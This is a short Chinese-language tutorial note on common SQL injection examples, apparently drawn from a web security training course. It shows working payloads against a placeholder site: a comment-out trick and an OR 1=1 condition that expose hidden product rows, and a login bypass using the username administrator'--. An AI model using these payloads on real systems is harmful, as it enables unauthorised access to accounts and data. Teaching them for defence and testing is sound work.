常见SQL注入的例子有:
1. 获取隐藏数据,修改SQL查询命令获得额外的结果
先看sql命令
SELECT * FROM products WHERE category = 'Gifts' AND released = 1- 以上是查询gifts分类并且是已经发布的产品 released =1 已经发布的商品,released =0 未发布的产品
-
This SQL query asks the database to return:
需要数据库返回,从products表中满足分类是gifts且released=1的所有数据 - 应用没有做sqli的保护,攻击者可以构造这么个请求
-
https://insecure-website.com/products?category=Gifts'--到sql里就是,
-
SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1因为sql中--是注释,所以后面就不起作用了,这样就可以获得gitfs里的所有内容,不管是否released
-
更进一步,可以获取所有分类的数据,构造请求
-
https://insecure-website.com/products?category=Gifts'+OR+1=1--sql 解析
-
SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1
1=1 永远为真,并且 or
所以返回搜有items,不仅仅是gifts
2. bypass ,改变原来的逻辑
web应用需要用户输入账号密码,如果应用没有做任何防sqli的处理,可能直接用输入的username跟password组成这么个查询语句,这种场景就非常容易被攻击了
SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'只要构造个输入达到以下目的即可。获得admin权限,即使在不知道密码的情况下,因为--是注释。这个adminstrator可以是试出来的,也可能是admin
SELECT * FROM users WHERE username = 'administrator'--' AND password = ''所以登陆输入username = administrator'--
随便输入密码就能实现bypass了